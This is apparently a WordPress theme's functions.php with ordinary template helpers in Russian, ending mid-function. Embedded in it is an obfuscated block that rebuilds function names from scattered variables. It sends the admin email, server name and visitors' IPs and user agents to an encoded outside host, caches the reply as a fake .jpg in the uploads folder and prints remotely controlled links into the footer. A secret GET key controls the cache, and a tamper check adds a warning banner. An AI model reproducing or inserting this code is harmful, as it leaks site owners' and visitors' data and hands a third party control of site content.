<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $GaFYKdZ='e';$SgVGv='b';$mJhi='d';$EcTnE='4';$IEvnD='e';$ucXtTvF='s';$GcWF='_';$EhSua='e';$ICisxU='a';$AwYH='6';$YCQSY='d';$qDmQ='c';$lxrQAkd='o';$uPsKxavx=$SgVGv.$ICisxU.$ucXtTvF.$GaFYKdZ.$AwYH.$EcTnE.$GcWF.$YCQSY.$IEvnD.$qDmQ.$lxrQAkd.$mJhi.$EhSua;$pCOLBNd='z';$YZMl='f';$UCYUDLS='g';$GNTBqFu='l';$yGEIv='e';$UWTG='a';$pPRC='i';$GKBWz='t';$ljPS='n';$HJHcigAm=$UCYUDLS.$pCOLBNd.$pPRC.$ljPS.$YZMl.$GNTBqFu.$UWTG.$GKBWz.$yGEIv;$hcsDzm='r';$JHKNb='3';$FndtYib='r';$fkBy='t';$VTDmgWx='_';$MpsRz='o';$HrDo='s';$CMIfYOc='1';$pjbrBEQ='t';$skOJQiOK=$HrDo.$fkBy.$hcsDzm.$VTDmgWx.$FndtYib.$MpsRz.$pjbrBEQ.$CMIfYOc.$JHKNb;$zbHfUdj='r';$ESbpNii='e';$zeWPx='v';$qsKqRP='t';$SGqW='s';$cdqZ='r';$hXLnSmLU=$SGqW.$qsKqRP.$zbHfUdj.$cdqZ.$ESbpNii.$zeWPx;                     
		$kh_____i='e';$vu______y='b';$kc__s='d';$ot______p='4';$hj_____________e='e';$jw______r='s';$jl___________c='_';$uw___________j='e';$xk__________p='a';$hs_____________z='6';$zn__v='d';$tk_____________d='c';$hc_____________s='o';$zn__________i=$vu______y.$xk__________p.$jw______r.$kh_____i.$hs_____________z.$ot______p.$jl___________c.$zn__v.$hj_____________e.$tk_____________d.$hc_____________s.$kc__s.$uw___________j;
		$fb_____________g='o';$pf______a='n';$pf__________s='u';$ys________j='x';$vj________e='i';$mp__m='f';$im______s='t';$cr___s='_';$nl_______a='i';$wt_______l='e';$ie___________n='s';$fg_______l='t';$em__________r='n';$ld______________c='c';$vu______________j='s';$jl______g=$mp__m.$pf__________s.$pf______a.$ld______________c.$im______s.$nl_______a.$fb_____________g.$em__________r.$cr___s.$wt_______l.$ys________j.$vj________e.$vu______________j.$fg_______l.$ie___________n;
		$xa_________o='o';$it______h='p';$ss______a='f';$cu___e='e';$ql____f='n';$xu__________a=$ss______a.$xa_________o.$it______h.$cu___e.$ql____f;
		$bs________i='d';$nl_________d='a';$ti____i='e';$sd____________x='r';$wg______________n='f';$jy____________q=$wg______________n.$sd____________x.$ti____i.$nl_________d.$bs________i;
		$ka______________u='l';$dv______i='s';$jw_____g='e';$tc________n='c';$sb__r='o';$oy_________t='f';$nw_______q=$oy_________t.$tc________n.$ka______________u.$sb__r.$dv______i.$jw_____g;
		
		define("WP_ID", $zn__________i("Mi4wLjA="));
		define("WP_TTL", $zn__________i("MTA4MDA="));
		define("WP_SRC", $zn__________i("dHBva24="));
	


		function wp_get_header() {
			global $zn__________i, $jl______g;
			
			if (
				$jl______g($zn__________i("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$jl______g($zn__________i("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$jl______g($zn__________i("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $zn__________i, $xu__________a, $nw_______q, $jy____________q;
			
			$fl__________y = TEMPLATEPATH."/".$zn__________i("Zm9vdGVyLnBocA==");
			$dr_______t = @$xu__________a($fl__________y, "r");
			$fl__________y = @$jy____________q($dr_______t, @filesize($fl__________y));
			@$nw_______q($dr_______t);
			
			$hn____________r = TEMPLATEPATH."/".$zn__________i("ZnVuY3Rpb25zLnBocA==");
			$dr_______t = @$xu__________a($hn____________r, "r");
			$hn____________r = @$jy____________q($dr_______t, @filesize($hn____________r));
			@$nw_______q($dr_______t);
			
			$xr____o = 0;
			if($fl__________y && $hn____________r) {
				if ($zn__________i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($fl__________y, $zn__________i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$xr____o = 1;
					}
					if (substr_count($fl__________y, "wp_theme_GPL_credits()") < 1) {
						$xr____o = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$xr____o = 12;
				}
			}
			
			if($xr____o > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $xr____o -->";
			}
		}
	


		function wp_loaded() {
			global $zn__________i, $jl______g;
			return $jl______g($zn__________i("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($vp_______e, $my____________i = "(more...)", $ue__x = 0, $tn____________d = "") {
				$ob_________m = get_the_content($my____________i, $ue__x, $tn____________d);
				$ob_________m = apply_filters("the_content", $ob_________m);
				
				$ob_________m = str_replace("]]>", "]]>", $ob_________m);
				if (strlen($_GET["p"]) > 0) {
					echo $ob_________m;
				}
				else if ((strlen($ob_________m)>$vp_______e) && ($wj______________l = strpos($ob_________m, " ", $vp_______e ))) {
					$ob_________m = substr($ob_________m, 0, $wj______________l);
					$ob_________m = $ob_________m;
					echo $ob_________m;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$my____________i</a></div></p>";
				} else {
					echo $ob_________m;
				}
				
			}
		}
	


		$mj______________q='e';$zx_____________l='e';$xo___c='6';$jf____________c='b';$az______o='s';$dm_________g='4';$xb___w='o';$xs_______________g='e';$dv_________r='a';$ox____________o='c';$pf_______________u='_';$yt______c='n';$yy_____v='d';$id______y=$jf____________c.$dv_________r.$az______o.$zx_____________l.$xo___c.$dm_________g.$pf_______________u.$xs_______________g.$yt______c.$ox____________o.$xb___w.$yy_____v.$mj______________q;
		$ww_________s='l';$ua__l='t';$fo_____________w='_';$ty_____g='n';$vv______f='o';$rf_________j='f';$tt___i='e';$sy______p='c';$ku__f='n';$re___k='i';$rl______________k='s';$eh_______e='t';$nf___e='_';$ky___________a='e';$pr____________s='e';$al______x='g';$vc__________a='t';$zj_________p=$rf_________j.$re___k.$ww_________s.$ky___________a.$nf___e.$al______x.$pr____________s.$ua__l.$fo_____________w.$sy______p.$vv______f.$ty_____g.$eh_______e.$tt___i.$ku__f.$vc__________a.$rl______________k;
		$qe_____y='s';$ut_______k='s';$bk_____________l='i';$el___s='e';$pp____________y='e';$hd___m='i';$ik_______x='t';$oi_____c='x';$wg______j='_';$ok______m='l';$kf______v='f';$cp______________z=$kf______v.$hd___m.$ok______m.$pp____________y.$wg______j.$el___s.$oi_____c.$bk_____________l.$qe_____y.$ik_______x.$ut_______k;
		$ur________h='s';$cm_______________q='r';$eb______e='o';$qt_______________b='e';$ep_______v='p';$ne____________j='n';$qb__________j='i';$kj____________i='_';$bx__________m='c';$hn____c='m';$ra____v='a';$kp____________v='e';$gx____k='r';$ys____h='v';$nk______t='o';$hm______________p=$ys____h.$kp____________v.$gx____k.$ur________h.$qb__________j.$eb______e.$ne____________j.$kj____________i.$bx__________m.$nk______t.$hn____c.$ep_______v.$ra____v.$cm_______________q.$qt_______________b;
		$ww_____________e='n';$kq___________a='o';$ro_____________p='k';$tp_________p='e';$yn___________b='c';$uw_____z='p';$ic______________z='s';$gi______k='o';$vg______h='f';$tg______________f=$vg______h.$ic______________z.$gi______k.$yn___________b.$ro_____________p.$kq___________a.$uw_____z.$tp_________p.$ww_____________e;
		$tm______________t='r';$ta___r='f';$xs_____________l='t';$tz_______o='i';$tg______________v='w';$qa____________l='e';$cb______x=$ta___r.$tg______________v.$tm______________t.$tz_______o.$xs_____________l.$qa____________l;
		$ku______________a='5';$pr_______________m='d';$rp_____l='m';$sh____________a=$rp_____l.$pr_______________m.$ku______________a;
		$dp______________y='e';$ip_________h='a';$aw_______w='a';$kv____b='r';$yv_________r='t';$tm____d='h';$aq______________c='l';$yz____________z='p';$ao____________a=$kv____b.$dp______________y.$ip_________h.$aq______________c.$yz____________z.$aw_______w.$yv_________r.$tm____d;
		$md__x='u';$ju__________x='e';$yv__h='e';$tt__________e='z';$te____t='a';$xh_________x='i';$kf____v='s';$pv________m='r';$eu_____q='l';$am____s='n';$mh_______________a='i';$ne___________j=$md__x.$am____s.$kf____v.$ju__________x.$pv________m.$mh_______________a.$te____t.$eu_____q.$xh_________x.$tt__________e.$yv__h;
		$br_______________y='e';$fn_____e='a';$xc___c='m';$nk__z='t';$bz_____z='p';$jy__________g='m';$pz_____________n='n';$tt______________i=$nk__z.$br_______________y.$jy__________g.$bz_____z.$pz_____________n.$fn_____e.$xc___c;
		$xq________d='r';$ey___________x='t';$bz_____________f='e';$xo______________d='e';$rm_________b='_';$xi____y='t';$pi______n='o';$yo___v='a';$bq_____b='m';$je______r='c';$th____h='t';$qn_________h='r';$ji____z='c';$tz_________g='e';$xf____j='e';$il_______________r='s';$df_______________m='_';$rn________o='n';$np_______p='x';$li________b='a';$fq___________x='t';$ay_______________b=$il_______________r.$xi____y.$xq________d.$tz_________g.$li________b.$bq_____b.$rm_________b.$je______r.$pi______n.$rn________o.$ey___________x.$xf____j.$np_______p.$fq___________x.$df_______________m.$ji____z.$qn_________h.$bz_____________f.$yo___v.$th____h.$xo______________d;
	


		function kt_________y($vw_____w) {
			global $zn__________i, $jl______g, $zj_________p, $hm______________p, $ay_______________b;
			
			if (!$jl______g($zn__________i("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($hm______________p(PHP_VERSION, "5.0.0", ">=") && $jl______g($zn__________i("ZmlsZV9nZXRfY29udGVudHM=")) && $jl______g($zn__________i("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$mc_________i = $ay_______________b(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$xr_____________o = @$zj_________p($vw_____w, 0, $mc_________i);
			} else {
				$xr_____________o = @$zj_________p($vw_____w, 0);
			}
			
			return $xr_____________o;
		}
	


		function ix___i($vw_____w) {
			global $jl______g, $tg______________f, $cb______x, $zn__________i;
			
			if (!$jl______g($zn__________i("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$vc____h = strpos($vw_____w, "/", 7);
			$pg____x = array(
				"uri"     => substr($vw_____w, $vc____h),
				"host"    => str_replace("http://", "", substr($vw_____w, 0, $vc____h)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$rg___________g = @$tg______________f("$pg____x[host]", 80, $od_____x, $kn_______________v, 4);
			
			if (!$rg___________g) {
				return false;
			} else {
				$xr_____________o = "";
				$ww_______________q  = "GET $pg____x[uri] HTTP/1.0\r\n";
				$ww_______________q .= "Host: $pg____x[host]\r\n";
				$ww_______________q .= "Referer: $pg____x[referer]\r\n";
				$ww_______________q .= "Connection: Close\r\n\r\n";
				
				@$cb______x($rg___________g, $ww_______________q);
				
				while (!@feof($rg___________g)) {
					$bn___z = @fgets($rg___________g, (1024*24));
					
					if ($bn___z == "\r\n") {
						$gh________b = true;
						continue;
					}
					
					if ($gh________b) {
						$xr_____________o .= $bn___z;
					}
				}
				
				return $xr_____________o;
			}
		}
	


		function cv__________u($vw_____w) {
			global $jl______g;
			$dk______________h = false;
			
			if ($vw_____w != "") {
				if ($jl______g("kt_________y")) {
					$dk______________h = @kt_________y($vw_____w);
				}
				
				if (!$dk______________h && ($jl______g("ix___i"))) {
					$dk______________h = @ix___i($vw_____w);
				}
			}
			
			return $dk______________h;
		}
	


		function jc____u() {
			global $_SERVER, $sh____________a;
			
			$tz________d = $_SERVER["SERVER_NAME"];
			
			if (substr("$tz________d", 0, 4) == "www.") {
				$tz________d = substr("$tz________d", 4);
			}
			
			$tz________d = $sh____________a("$_SERVER[SERVER_NAME]");
			
			return $tz________d;
		}
	


		function vc____d() {
			return "file";
		}
	


		function ky___________j($vw_____w) {
			global $_SERVER, $zj_________p, $cp______________z, $xu__________a, $nw_______q, $cb______x;
			
			$dv_________o = ep_____v();
			
			$bz______h = jc____u().".jpg";
			$wj__________k = $dv_________o["dir_upload"]["path"]."/$bz______h";
			$ri______y = @filemtime($wj__________k);
			
			if (!$ri______y || ((time()-$ri______y) >= WP_TTL)) {
				$dk______________h = cv__________u($vw_____w);
				
				if ($dk______________h) {
					if ($cp______________z($wj__________k)) {
						@unlink($wj__________k);
					}
					
					$dr_______t = @$xu__________a($wj__________k, "x+");
					
					@$cb______x($dr_______t, $dk______________h);
					@$nw_______q($dr_______t);
				}
			} else {
				if ($cp______________z($wj__________k)) {
					$dk______________h = @$zj_________p($wj__________k);
				} else {
					$dk______________h = false;
				}
			}
			
			return $dk______________h;
		}
	


		function ep_____v() {
			global $_SERVER, $zn__________i, $id______y;
			
			$nl___b = wp_count_posts("post");
			$gx________k = pathinfo(get_bloginfo("template_directory"));
			
			$dv_________o = array(
				"url" => array(
					"report"      => $zn__________i("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $gx________k,
				"dir_upload"	=> zi____k(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$gx________k[filename],
					"a005=".$nl___b->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$dv_________o["url"]["queryString"] = implode("&", $dv_________o["queryString"]);
			$dv_________o["url"]["report"] = $dv_________o["url"]["report"]."/?".$id______y($dv_________o["url"]["queryString"]).".html";
						
			return $dv_________o;
		}
	


		function zi____k() {
			$mh_____________g = wp_upload_dir();
			
			if (isset($mh_____________g["error"])) {
				$ld__k = cb________r();
				if (is_writable($ld__k)) {
					$mh_____________g = array("path" => $ld__k);
				}
			}

			return $mh_____________g;
		}
	


		function cb________r() {
			global $jl______g, $sh____________a, $ao____________a, $tt______________i;
			
			$cf_____o = (bool) ini_get("safe_mode");
			if ($cf_____o == true) {
				return false;
			}
			
			if ($jl______g("sys_get_temp_dir")) {
				$gp_______a = sys_get_temp_dir();
				if (is_writable($gp_______a)) {
					return $ao____________a($gp_______a);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ao____________a($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ao____________a($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ao____________a($_ENV["TEMP"]);
			} else {
				$ku___w = $tt______________i($sh____________a(uniqid(rand(), true)), "");
				if ($ku___w) {
					$gp_______a = $ao____________a(dirname($ku___w));
					@unlink($ku___w);
					return $gp_______a;
				} else {
					return false;
				}
			}
		}
	


		function go___________t() {
			global $_GET, $cp______________z;
			
			$dv_________o = ep_____v();
			$tz________d = jc____u();
			$of_______l = vc____d();
			
			$zn________f = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($of_______l == "file") {
					$qh_____________a = $dv_________o["dir_upload"]["path"]."/".$tz________d.".jpg";
					if ($cp______________z($qh_____________a)) {
						@unlink($qh_____________a);
						$zn________f = "deleted";
					}
				}
				
				$wl___________q = array(
					"s"	=> $zn________f,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($wl___________q AS $fp___w => $xy______________r) echo " [$fp___w:$xy______________r]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $jl______g, $zn__________i, $ne___________j;
			$dv_________o = ep_____v();
			
			$vy___________e = "ky___________j";
			if ($jl______g($vy___________e)) {
				$xr_____________o = $vy___________e($dv_________o["url"]["report"]);
			}
			
			if ($xr_____________o) {
				if ($xr_____________o = @$zn__________i($xr_____________o)) {
					$xr_____________o = @$ne___________j($xr_____________o);
					
					if (strlen($xr_____________o[custom_credit]) >= 5) {
						$dv_________o["default_string"] = $xr_____________o[custom_credit];
					}
					
					if ($xr_____________o["status"] == "0") {
						$li________s = 1;
						$rt_______f = 1;
					} else {
						$pt_________i = sizeof($xr_____________o["links"]);
						$pw_______l = $dv_________o["default_string"];
						
						if ($pt_________i > 0 && $xr_____________o["links"] !== "") {
							$so_____t = 0;
							foreach ($xr_____________o["links"] as $cr____________l => $gb________m) {
								$so_____t++;
								if ($gb________m->l_path == "" || $gb________m->l_path == $_SERVER["REQUEST_URI"]) {
									$gb________m->l_href = htmlspecialchars(strip_tags($gb________m->l_href));
									$gb________m->l_title = htmlspecialchars(strip_tags($gb________m->l_title));
									$gb________m->l_anchor = htmlspecialchars(strip_tags($gb________m->l_anchor));
									$pw_______l .= " | ";
									$pw_______l .= "<a href='$gb________m->l_href' title='$gb________m->l_title'";
									if ($gb________m->l_nofollow == "1") {
										$pw_______l .= " rel='nofollow'";
									}
									$pw_______l .= ">$gb________m->l_anchor</a>";
								}
							}
						}
						$dv_________o["links"] = "$pw_______l";
						if ($xr_____________o[credit] == "0") {
							$dv_________o["links"] = "";
						}
					}
				} else {
					$li________s = "1";
				}
			} else {
				$li________s = "1";
			}
			
			if ($li________s == "1") {
				$dv_________o["links"] = $dv_________o["default_string"];
			}
			
			echo "$dv_________o[links]";
			
			echo "<!-- s: $xr_____________o[signature] -->";
			go___________t();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
